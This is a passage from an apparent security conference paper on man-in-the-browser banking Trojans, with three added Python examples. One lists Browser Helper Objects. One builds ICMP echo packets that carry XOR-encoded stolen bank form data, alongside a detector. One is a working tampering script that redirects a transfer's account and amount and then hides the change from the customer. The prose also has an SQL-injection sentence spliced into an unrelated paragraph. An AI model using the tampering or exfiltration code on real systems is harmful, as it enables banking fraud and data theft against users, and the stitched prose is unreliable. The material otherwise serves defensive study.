Proceedings of the 7th Australian Information Security Management Conference
browser (Blunden, 2009). BHOs leave registry entries under the key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects. They are written in languages such as C++ and are used to link IE components together to build applications (Microsoft Corporation, 2009). Because a BHO shares the browser's address space, it has far greater access to browser resources than a web page: it can read browser memory directly (Louw & Lim, 2008), intercept the user's interactions with IE inside the browser process, and store them on the user's computer. A BHO also has nearly unlimited access to operating system resources such as network sockets, files and processes (Raffetseder, Kirda, & Kruegel, 2007).
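As an added example (not code from the paper), the following Python lists the BHOs recorded under that registry key from a `reg export` file, joining each CLSID to the DLL registered as its in-process server under HKCR\CLSID and flagging DLLs loaded from outside the usual install directories. The GUIDs, names and paths in the embedded sample are constructed for the illustration; `list_bhos_live` reads the same keys directly on Windows through the standard library's winreg module.

```python
"""List Internet Explorer Browser Helper Objects from exported registry data.

Added example, not code from the paper. The parser handles the text format
written by `reg export`; the sample below is constructed and its GUIDs,
names and DLL paths are made up.
"""
import re

BHO_KEY = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion"
           r"\Explorer\Browser Helper Objects")
CLSID_KEY = r"HKEY_CLASSES_ROOT\CLSID"

# Constructed sample: the BHO key export merged with the matching CLSID entries.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-2222-3333-4444-555555555555}]
@="Example Toolbar Helper"
"NoExplorer"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{AAAAAAAA-BBBB-CCCC-DDDD-EEEEEEEEEEEE}]

[HKEY_CLASSES_ROOT\CLSID\{11111111-2222-3333-4444-555555555555}\InprocServer32]
@="C:\\Program Files\\Example\\helper.dll"
"ThreadingModel"="Apartment"

[HKEY_CLASSES_ROOT\CLSID\{AAAAAAAA-BBBB-CCCC-DDDD-EEEEEEEEEEEE}]
@="Video Saver"

[HKEY_CLASSES_ROOT\CLSID\{AAAAAAAA-BBBB-CCCC-DDDD-EEEEEEEEEEEE}\InprocServer32]
@="C:\\Users\\alice\\AppData\\Local\\Temp\\upd.dll"
"ThreadingModel"="Apartment"
"""

SECTION_RE = re.compile(r"^\[(.+)\]$")
VALUE_RE = re.compile(r'^(?:@|"(?P<name>[^"]+)")=(?P<val>.*)$')


def _unquote(raw):
    """Strip the quotes of a REG_SZ literal and undo its backslash escaping."""
    if raw.startswith('"') and raw.endswith('"'):
        return raw[1:-1].replace('\\"', '"').replace("\\\\", "\\")
    return raw  # dword:/hex: values are left as written


def parse_reg(text):
    """Return {key_path: {value_name: value}}; the default value is stored under ""."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        section = SECTION_RE.match(line)
        if section:
            current = section.group(1)
            keys.setdefault(current, {})
            continue
        value = VALUE_RE.match(line)
        if value and current is not None:
            keys[current][value.group("name") or ""] = _unquote(value.group("val"))
    return keys


def list_bhos(keys):
    """Join every CLSID under the BHO key with its name and in-process server DLL."""
    prefix = BHO_KEY + "\\"
    bhos = []
    for path, values in keys.items():
        if not path.startswith(prefix) or "\\" in path[len(prefix):]:
            continue
        clsid = path[len(prefix):]
        name = values.get("") or keys.get(f"{CLSID_KEY}\\{clsid}", {}).get("", "")
        server = keys.get(f"{CLSID_KEY}\\{clsid}\\InprocServer32", {})
        bhos.append({"clsid": clsid, "name": name,
                     "dll": server.get("", "<no InprocServer32>")})
    return bhos


TRUSTED_DIRS = ("c:\\program files", "c:\\windows")


def is_suspicious(bho):
    """Heuristic: a BHO DLL outside the normal install directories deserves a look.
    Commodity Trojans often drop into %TEMP% or %APPDATA%; this is a hint, not proof."""
    return not bho["dll"].lower().startswith(TRUSTED_DIRS)


def list_bhos_live():
    """Read the same keys directly on Windows (stdlib winreg). 32-bit IE BHOs on a
    64-bit system are registered under SOFTWARE\\Wow6432Node as well."""
    import winreg
    found = []
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, BHO_KEY.split("\\", 1)[1]) as key:
        for i in range(winreg.QueryInfoKey(key)[0]):
            clsid = winreg.EnumKey(key, i)
            try:
                dll = winreg.QueryValue(winreg.HKEY_CLASSES_ROOT,
                                        f"CLSID\\{clsid}\\InprocServer32")
            except OSError:
                dll = "<no InprocServer32>"
            found.append({"clsid": clsid, "name": "", "dll": dll})
    return found


if __name__ == "__main__":
    for bho in list_bhos(parse_reg(SAMPLE_REG)):
        flag = "SUSPICIOUS" if is_suspicious(bho) else "ok"
        print(f"{flag:10} {bho['clsid']} {bho['name']!r} -> {bho['dll']}")
```

`reg export` writes UTF-16 text, so a real export should be read with `open(path, encoding="utf-16")` before being handed to `parse_reg`. The path heuristic is only a triage aid: a BHO installed under Program Files can still be malicious, and the DLL itself should be hashed and inspected.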
Lastly, some Internet users may have heard of the 'unplug' extension, which lets a user save embedded streaming video from a web page, such as YouTube or MySpace, as a video file on the computer (Blum & LeBlanc, 2009).
Extensions like these can be used to perform malicious activity: capturing, modifying and stealing the customer's banking information and sending it back to the attacker in Internet Control Message Protocol (ICMP) packets, e-mails or HTTP POST sessions. The malware encodes the data with a simple XOR scheme before placing it in the data section of an ICMP echo (ping) packet; the packet then carries the encoded sensitive data past administrators and egress filters that allow ping traffic. Injected strings such as "OR 1=1" entered in a text field create an always-true condition that bypasses logic checks or authentication (Scambray, Shema, & Sima, 2006); such a condition causes the SQL server to return every record from the affected tables, with the consequence that the attacker may gain full access to one or more databases (Rietta, 2006). The exfiltration packet masquerades as legitimate traffic, particularly where keylogger technology has been combined with the Trojan attack (Oiaga, 2006). A man-in-the-browser attack operates inside the browser, where the data is handled in the clear, so it simply bypasses public key infrastructure (PKI) security measures (Gühring, 2006) as well as Secure Sockets Layer and Transport Layer Security (SSL/TLS) encryption (Ollmann, 2009). Such Trojans are very difficult to detect and remove because their network connection is not tied to the Uniform Resource Locator (URL) the user visits (Cronto, 2008); they operate at a different layer. Besides transaction authentication, Trojans can circumvent the following standard authentication systems, all of which use the PC as a single channel for transmitting data to the server:
Username and password
Transaction authentication number (TAN)/ Indexed transaction authentication number (iTAN)
Secure ID tokens
One time pad tokens
Smartcard and/or class 3 reader authentication with client certificates
Bürgerkarte Security layer
Digital Signatures with smartcards and class 3 readers (Gühring, 2006)
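The ICMP covert channel described above, as an added example that is not the paper's code: the Python below builds an echo request whose data section carries XOR-encoded form data, and beside it the check a network defender can run over captured echo requests, comparing the data section with the stock ping payloads, measuring its entropy and brute-forcing a single-byte XOR key. The form data, the key 0x5A, the ICMP identifier and every other value are constructed for the illustration; nothing is transmitted.

```python
"""Covert ICMP exfiltration (XOR-encoded data in the echo-request payload) and a
check that recovers it.  Added example, not code from the paper; the packets
and the "stolen" form data are constructed here and nothing is sent.
"""
import math
import struct

ICMP_ECHO_REQUEST = 8
WINDOWS_PING_DATA = b"abcdefghijklmnopqrstuvwabcdefghi"  # 32-byte default of Windows ping
# Bytes a form-data exfil is likely to contain; used to score single-byte XOR guesses
LIKELY = set(b"abcdefghijklmnopqrstuvwxyz0123456789=&:;,. ")


def internet_checksum(data):
    """RFC 1071 one's-complement checksum; a packet whose field is correct sums to 0."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def xor_bytes(data, key):
    """Repeating-key XOR; the same call encodes and decodes."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def build_echo_request(payload, ident=0x1234, seq=1):
    """ICMP echo request (type 8) with an arbitrary data section."""
    header = struct.pack("!BBHHH", ICMP_ECHO_REQUEST, 0, 0, ident, seq)
    csum = internet_checksum(header + payload)
    return struct.pack("!BBHHH", ICMP_ECHO_REQUEST, 0, csum, ident, seq) + payload


def parse_echo(packet):
    typ, code, csum, ident, seq = struct.unpack("!BBHHH", packet[:8])
    return {"type": typ, "code": code, "checksum": csum,
            "id": ident, "seq": seq, "payload": packet[8:]}


def linux_ping_payload(timestamp=b"\x00" * 8, size=56):
    """Default Linux ping data: an 8-byte timestamp followed by 0x10, 0x11, ..."""
    return timestamp + bytes(range(0x10, 0x10 + size - 8))


def is_standard_ping_payload(payload):
    """True for the default payloads of Windows ping and Linux ping."""
    if payload == WINDOWS_PING_DATA:
        return True
    n = len(payload) - 8
    return n >= 0 and payload[8:] == bytes((0x10 + i) & 0xFF for i in range(n))


def entropy_bits(data):
    """Shannon entropy per byte; counter-style or text-like data sits well below 8."""
    if not data:
        return 0.0
    counts = {}
    for b in data:
        counts[b] = counts.get(b, 0) + 1
    return -sum(c / len(data) * math.log2(c / len(data)) for c in counts.values())


def recover_single_byte_xor(payload):
    """Try all 256 keys and keep the one whose output looks most like form data."""
    def score(buf):
        return sum(1 if b in LIKELY else (-2 if b < 0x20 or b > 0x7E else 0) for b in buf)
    best_key = max(range(256), key=lambda k: score(xor_bytes(payload, bytes([k]))))
    return best_key, xor_bytes(payload, bytes([best_key]))


def analyse(packet):
    """Triage one echo request: is the data section a stock ping, and if not, does it decode?"""
    echo = parse_echo(packet)
    result = {"valid_checksum": internet_checksum(packet) == 0,
              "standard_payload": is_standard_ping_payload(echo["payload"]),
              "entropy": round(entropy_bits(echo["payload"]), 2),
              "xor_key": None, "decoded": None}
    if not result["standard_payload"]:
        result["xor_key"], result["decoded"] = recover_single_byte_xor(echo["payload"])
    return result


# Constructed "captured" form data and a constructed key for the demonstration
SECRET = b"acct=123456789&pin=4321&user=alice"
KEY = bytes([0x5A])
BENIGN_PACKET = build_echo_request(linux_ping_payload())
EXFIL_PACKET = build_echo_request(xor_bytes(SECRET, KEY))

if __name__ == "__main__":
    for name, pkt in (("benign", BENIGN_PACKET), ("exfil", EXFIL_PACKET)):
        print(name, analyse(pkt))
```

`analyse` works on the ICMP bytes alone, so a capture has to have its IP header stripped before each echo request is passed in. A longer repeating key defeats the single-byte brute force, but the non-standard payload test still flags the packet; the practical lesson is that an egress policy which allows ping should also inspect or normalise the data section rather than trust the protocol name.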
Tampering techniques with browser extension tools
This paper reviews the two most widely used browsers, Firefox and Internet Explorer, in more detail. Tampering tools masquerade as plug-ins installed in IE or Firefox and can expose aspects of HTTP/HTTPS sessions on the fly, including headers, forms and cookies (Scambray et al., 2006). Parameters of GET, POST or PUT requests can be manipulated or created so that the changed values are sent to any destination without the customer noticing, while the value the customer intended is still shown on the customer's screen (Ollmann, 2009). Some plug-in Trojans can tamper with the GET parameters used to request a page from a server on the customer's behalf (Fadia, 2006), bypassing any browser-side restrictions.
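The parameter tampering just described, as an added example that is not the paper's code: the Python below rewrites the query string of a GET request or the form body of a POST request (recomputing Content-Length so the request stays well-formed) and then rewrites the server's reply so the customer sees the values they typed. The request, host name, parameter names and confirmation page are constructed for the illustration and belong to no real bank.

```python
"""Parameter tampering as a man-in-the-browser plug-in performs it: rewrite the
outgoing request, then rewrite the response so the victim sees what they typed.
Added example, not code from the paper; the request, host, parameter names and
confirmation page are constructed and belong to no real bank.
"""
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# Constructed request the customer's browser is about to send
ORIGINAL_REQUEST = (
    "POST /transfer HTTP/1.1\r\n"
    "Host: bank.example\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 39\r\n"
    "\r\n"
    "to_account=12345678&amount=50&memo=rent"
)


def parse_request(raw):
    """Split a raw HTTP/1.1 request into start line, header list and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return {"method": method, "target": target, "version": version,
            "headers": headers, "body": body}


def serialize_request(req):
    head = [f"{req['method']} {req['target']} {req['version']}"]
    head += [f"{name}: {value}" for name, value in req["headers"]]
    return "\r\n".join(head) + "\r\n\r\n" + req["body"]


def set_header(req, name, value):
    """Replace a header in place (or append it) without disturbing the others."""
    updated, found = [], False
    for n, v in req["headers"]:
        if n.lower() == name.lower():
            updated.append((n, value))
            found = True
        else:
            updated.append((n, v))
    if not found:
        updated.append((name, value))
    req["headers"] = updated


def tamper_params(query, overrides):
    """Rewrite selected fields of a urlencoded string; order and other fields are kept."""
    pairs = [(k, overrides.get(k, v)) for k, v in parse_qsl(query, keep_blank_values=True)]
    return urlencode(pairs)


def tamper_request(raw, overrides):
    """Apply overrides to the GET query string or the POST form body and fix Content-Length."""
    req = parse_request(raw)
    if req["method"] == "GET":
        parts = urlsplit(req["target"])
        req["target"] = urlunsplit(parts._replace(query=tamper_params(parts.query, overrides)))
    else:
        req["body"] = tamper_params(req["body"], overrides)
        set_header(req, "Content-Length", str(len(req["body"].encode())))
    return serialize_request(req)


def hide_tampering(response_body, overrides, originals):
    """Put the customer's own values back into the server's reply so nothing looks wrong.
    Plain substring replacement is enough for this demonstration; in-browser Trojans
    patch the page's DOM instead."""
    for field, attacker_value in overrides.items():
        response_body = response_body.replace(attacker_value, originals[field])
    return response_body


if __name__ == "__main__":
    overrides = {"to_account": "99999999", "amount": "4500"}
    originals = {"to_account": "12345678", "amount": "50"}
    print(tamper_request(ORIGINAL_REQUEST, overrides))
    # Constructed confirmation page as the server would return it for the tampered request
    reply = "<p>Transferred $4500 to account 99999999</p>"
    print(hide_tampering(reply, overrides, originals))
```

The tampered request is syntactically indistinguishable from one the customer sent, which is why the server cannot detect this on its own and why confirming transaction details over a channel the browser does not control matters more than stronger login authentication.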